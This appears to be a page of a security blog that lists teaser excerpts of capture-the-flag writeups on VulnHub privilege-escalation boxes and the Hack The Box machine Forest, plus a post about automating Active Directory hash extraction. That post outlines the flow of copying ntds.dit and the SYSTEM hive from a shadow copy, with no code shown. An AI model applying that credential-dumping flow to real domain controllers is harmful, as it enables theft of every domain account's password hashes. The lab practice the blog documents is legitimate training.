The description states:  "This VM is made for playing with privileges. As its name, this box is specially made for learning and sharpening Linux Privilege Escalation skills. There are number of ways to playing with the privileges." 

    Seems like there were a number of options but I think I took the most direct.  When I scanned with the long version of Nmap, it showed a long time for completion.  I kick off with the short form:

    The description states: "Vulnerable VM to learn Basics of privilege escalation.  Difficulty : Easy  Goal : Your goal will be to get highest privileged user and collect the flag."

    So here's what I like about this box, it states the level is Easy and that is true.  Again, this is in the eye of the beholder but I've seen some boxes where Easy isn't exactly Easy.  Or maybe it's Easy but it's a CTF style box.  This isn't that type of box.  It's just a poorly configured machine and it has either a few rabbit holes or a few steps I just skipped because you can.  Either way, you explore a little if this is unfamiliar and that's how you learn.


    The description states:  "Debian 10 64 bit machine . This is a simple box. No advanced stuff , just some fun… can you find the trail to root?

    I'm not into boxes that I have to brute force my way in.  The box states "simple" but I would add not beginner.  It's not hard but a beginner might get stuck.  It almost feels like something broke when the box was pushed up because it just doesn't feel right.  The picture on Vulnhub shows the Forbidden page on the web and that is completely useful to us.  I don't want to get to far ahead and this one goes quick so here goes...

    I wrote a post a awhile back on how to retrieve and crack active directory hashes but the entire process is manual.  I had this bright idea that I'd automate the Windows side of it using PowerShell.  In my mind, I had the general flow -- create a directory for the files, create a shadow copy, copy the ntds.dit file from the shadow copy, expert SYSTEM from the registry, and then clean up the mess after I get my files.  Funny thing happened, the part where I copy from the shadow copy didn't work.  Turns out, PowerShell doesn't all you (or doesn't easily allow you) to access the shadow copy.

    Right off the bat, I want to say that this is probably one of the better boxes I've had the opportunity to play on.  I took a red teaming class a couple of years ago and we played around with BloodHound.  Unfortunately, the networks we manage aren't too complicated and the path drawn by BloodHound is typically move from "this" user to "this" workstation where there's a domain admin.  From "that" machine, you can get the domain controller. Not that Forest was too far off but it was clever, different, and it has a few moving parts.

    I realize that's sort of a spoiler but I found the box by searching for "real world hack the box" or something like that and it mentioned a few clues as to where things where going.  You still have to do the work.

    The description states:  "Difficulty : Intermediate ~ Hard.  There is one intended way to get low privilege user and two intended ways to get root shell.  Getting root using the easier way : Use anything you have.  Getting root the harder way : Only use what's in the /root/"

    Admittedly, I got root the first way I could find and I lost interest in the "harder" method.  I think I know what I'm supposed to do but I already have root so...

    Page 1 of 49

    © 2020